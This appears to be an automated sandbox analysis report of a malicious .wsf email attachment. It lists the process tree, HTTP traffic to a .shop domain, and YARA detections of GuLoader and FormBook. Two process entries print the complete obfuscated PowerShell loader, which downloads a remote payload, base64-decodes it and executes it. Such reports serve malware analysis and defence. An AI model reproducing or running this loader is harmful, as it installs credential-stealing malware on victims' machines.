                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
                                                Data Raw: 4a 44 31 78 3d 49 6c 59 65 4a 53 4c 55 33 55 47 4f 4d 45 6c 53 49 32 43 48 5a 55 6a 71 39 4f 6f 7a 34 63 5a 68 6b 4a 39 77 7a 78 44 6d 6e 55 69 53 49 51 32 74 58 31 71 6d 43 31 49 2f 35 39 63 71 47 39 49 55 4a 43 54 70 52 71 52 32 6b 72 61 67 46 72 57 74 52 48 4a 57 53 4c 51 64 70 55 70 4b 6a 34 64 39 70 54 75 58 31 4e 62 59 70 6a 57 5a 54 55 61 4e 59 49 32 36 70 6e 54 2b 69 53 32 79 6c 75 5a 34 58 76 4c 68 38 6a 49 4b 71 63 58 58 4e 4a 53 74 38 6c 4c 2f 66 36 71 4f 32 37 54 6e 59 4a 64 56 41 31 62 6d 30 47 7a 4c 58 59 48 35 79 7a 2f 55 65 4d 4e 46 63 71 76 53 73 43 66 51 70 50 59 41 4d 64 71 64 57 57 6c 4b 65 4a 74 6f 37 7a 51 5a 2b 46 58 30 6d 4a 5a 6a 51 69 34 57 6c 62 38 57 64 70 5a 32 47 52 56 4f 67 75 72 75 6b 2b 71 4d 48 58 70 73 46 6a 6a 50 47 72 75 6c 73 6a 48 79 69 79 47 34 6c 67 47 66 75 33 38 54 46 74 34 49 4b 46 73 48 4f 49 30 69 57 4f 64 4b 54 37 4b 6c 41 50 6a 31 72 49 4a 6d 63 76 56 49 42 64 66 55 39 4f 6d 6a 38 4a 38 68 4e 48 52 2b 63 6e 44 73 6e 56 54 53 7a 47 73 6e 68 76 30 4f 71 [TRUNCATED]
                                                Data Ascii: JD1x=IlYeJSLU3UGOMElSI2CHZUjq9Ooz4cZhkJ9wzxDmnUiSIQ2tX1qmC1I/59cqG9IUJCTpRqR2kragFrWtRHJWSLQdpUpKj4d9pTuX1NbYpjWZTUaNYI26pnT+iS2yluZ4XvLh8jIKqcXXNJSt8lL/f6qO27TnYJdVA1bm0GzLXYH5yz/UeMNFcqvSsCfQpPYAMdqdWWlKeJto7zQZ+FX0mJZjQi4Wlb8WdpZ2GRVOguruk+qMHXpsFjjPGrulsjHyiyG4lgGfu38TFt4IKFsHOI0iWOdKT7KlAPj1rIJmcvVIBdfU9Omj8J8hNHR+cnDsnVTSzGsnhv0Oq32X6EiF18vZoblY83R0zme3v55pAViZREU4wTFi0YA4KExrCreTI2tNChlbghwveEySLtFOvlvx032LMFNGrFBhiHdq9rJMAH/ZJ86wSHlTYQEWj5q1QJofmr6+qz7H6jLYmPnfhSQWwL0zIjrMqWSUv9uIYUc+4aila8/DFc7rtr+Qz+kUXaEiUtOq0AT5yCx0p6ngwt6A/c+zhXrgd8jMNWlMne5x9A5FZsRAC9D/dVpEMm5jcuwirtTJ7LejdKZc5NMsmo/wHsrOvbAKdK0+a1zjfSYT088Lfm1tSIZSwcZ79siuBEJ2kJR+MDtXveK5p4dWCKbp82lP0PA3IoOYceo+uSJTonlgMMKrHIse2MUT+UybcDHnOuJGw4ig+Kos95FZkTPkpOAl4ALsFkHuvaZICzlpEuQ76ijwjDSozqd8sjB8BNu91JMDkSsb9kO9ZOxBXZBwIyifkO7TV6Ieu54FRo/kN1KXbuIKBXWi/vCM+WKgenZtabUIk8FxQG8fDNwkPdWSZxNxL7koPkzJzT6uV0RRUd33DUpzLO59xVohV027nDVQ491CjSGV5gBDrK80hCuDPa4MJEqqN+XMWSJ+nANIwh6sk1jVs2t6ssTWLCHZxrYx5tMxzsbiicORP1yqOkJIlig3DW4rxvbdcioMLZ751Fl [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.64971523.82.11.73806448C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 26, 2024 21:58:06.440747023 CEST464OUTGET /u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g= HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.smartfindsdepot.shop
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
                                                Apr 26, 2024 21:58:08.116264105 CEST784INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Fri, 26 Apr 2024 19:58:07 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                X-Powered-By: PHP/7.4.30
                                                Vary: accept,content-type,accept-encoding,cookie
                                                Set-Cookie: slv_session_d59b34e738792ddf80a829a8d07b8b68=acc6fe59715cb9262cd05e15680600de%7C%7C1714334287%7C%7C1714330687%7C%7Ca1e540e5777a0b8070106a18f1e57c51; expires=Sun, 26-May-2024 19:58:07 GMT; Max-Age=2592000; path=/
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://smartfindsdepot.shop/u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g=


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:1
                                                Start time:21:55:57
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf"
                                                Imagebase:0x7ff600ff0000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:21:55:59
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"
                                                Imagebase:0x7ff6e3d50000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:21:55:59
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:21:56:03
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
                                                Imagebase:0x7ff611aa0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:21:56:09
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"
                                                Imagebase:0x7a0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2449498441.000000000580F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2456067729.0000000008600000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2459777266.0000000009FC7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:21:56:10
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
                                                Imagebase:0x1c0000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:21:56:25
                                                Start date:26/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0xcd0000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:12
                                                Start time:21:56:40
                                                Start date:26/04/2024
                                                Path:C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe"
                                                Imagebase:0x190000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                Target ID:13
                                                Start time:21:56:42
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\recover.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\recover.exe"
                                                Imagebase:0x1c0000
                                                File size:12'288 bytes
                                                MD5 hash:D38B657A068016768CA9F3B5E100B472
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:false

                                                Target ID:14
                                                Start time:21:57:00
                                                Start date:26/04/2024
                                                Path:C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe"
                                                Imagebase:0x190000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:15
                                                Start time:21:57:05
                                                Start date:26/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0xcd0000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:16
                                                Start time:21:57:07
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\rundll32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                Imagebase:0x7ff637990000
                                                File size:71'680 bytes
                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:21:57:15
                                                Start date:26/04/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0xcd0000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:18
                                                Start time:21:57:42
                                                Start date:26/04/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff728280000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Reset < >
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2654998145.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd348b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa6143b282e1805e9c7ead870c7335fcc3b018bbce49f0e3dc1565872a2c8ad9
                                                  • Instruction ID: 376b5ef6b09cbaf997c2ce46ef4c132fb852e18bb452f02c709ed2d6066daafa
                                                  • Opcode Fuzzy Hash: fa6143b282e1805e9c7ead870c7335fcc3b018bbce49f0e3dc1565872a2c8ad9
                                                  • Instruction Fuzzy Hash: B1F1B830A18A4D8FEBA9DF28C8657E937E1FF55310F04426EE84DC7291DF78A9458B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2654998145.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd348b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56cc7a2d0bc78a52543e6291ff8cf707db442a9cf90d71150c986f7e326272fe
                                                  • Instruction ID: ffe11d56d0721f4396c7114ab5d95ee7f16bea35161f95b0df4790c0e29d66d9
                                                  • Opcode Fuzzy Hash: 56cc7a2d0bc78a52543e6291ff8cf707db442a9cf90d71150c986f7e326272fe
                                                  • Instruction Fuzzy Hash: 5CE1A430A0CA4D8FEBA8DF28C8A57E977E1EF55311F04426ED84DC7291DE78A9858781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2655710376.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd34980000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 36dab82367c46b507a18572800920c27a32a2b5d4c7af7ce5538246ca1d038ec
                                                  • Instruction ID: 6bab97f9760ae46b361087ab418ad9f0a218d7bc2b599a648f300f5552278eb0
                                                  • Opcode Fuzzy Hash: 36dab82367c46b507a18572800920c27a32a2b5d4c7af7ce5538246ca1d038ec
                                                  • Instruction Fuzzy Hash: BB110A22B0D6858FEBA5DBAC54A42E87BD1EF69314F0441BFC54CD7187F9299805C321
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2654998145.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd348b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e99b89f687f3f6724d8ae340636a1cf9b72e181230606bc8b3d9a21e63b29c5
                                                  • Instruction ID: f94e868754a98096660085fe861881f99120e0c3ee682ea0d95aec8b9d35f54d
